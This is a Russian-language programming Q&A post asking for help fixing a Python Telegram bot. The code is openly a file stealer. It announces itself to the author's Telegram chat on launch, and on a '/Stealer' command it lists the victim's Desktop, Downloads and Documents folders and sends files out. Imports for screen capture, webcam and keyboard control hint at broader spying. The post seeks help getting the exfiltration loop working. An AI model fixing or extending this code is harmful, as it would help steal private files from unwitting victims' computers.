# Проблема с TG ботом

Tags: python

При попытке получения названий файлов и из этого списка перебором скачивание элементов появляется ошибка. Если кратко то я пытался чтоб бот из переменной dirs по 1 файлу присылал их мне.

```
import telebot
import requests
import os
import random
import sys
import cv2
import wave
import time
import smtplib
import sqlite3
import zipfile
from PIL import ImageGrab
from telebot import types
import shutil
import pyautogui as pg
import platform

token = '...'
chat_id = '...'

bot = telebot.TeleBot(token)

requests.post(f"https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text=Online")

@bot.message_handler(commands=['Stealer'])
def stealer(message):
    dirs = '\n'.join(os.listdir(path='C:\\Users\\' + os.getlogin() + '\\Desktop'))
    dirs1 = '\n'.join(os.listdir(path='C:\\Users\\' + os.getlogin() + '\\Downloads'))
    dirs2 = '\n'.join(os.listdir(path='C:\\Users\\' + os.getlogin() + '\\Documents'))
    a = os.listdir(path='C:\\Users\\' + os.getlogin() + '\\Desktop')
    download = open('Новый текстовый документ.txt', "rb")
    bot.send_document(message.chat.id, download)
    '''if i[-3] == 'd' or 'p' or 't' or 'j' or 'p':
            download = open(i, 'rb')
            bot.send_document(message.chat.id, download)'''

bot.polling(none_stop=True, interval = 0)
```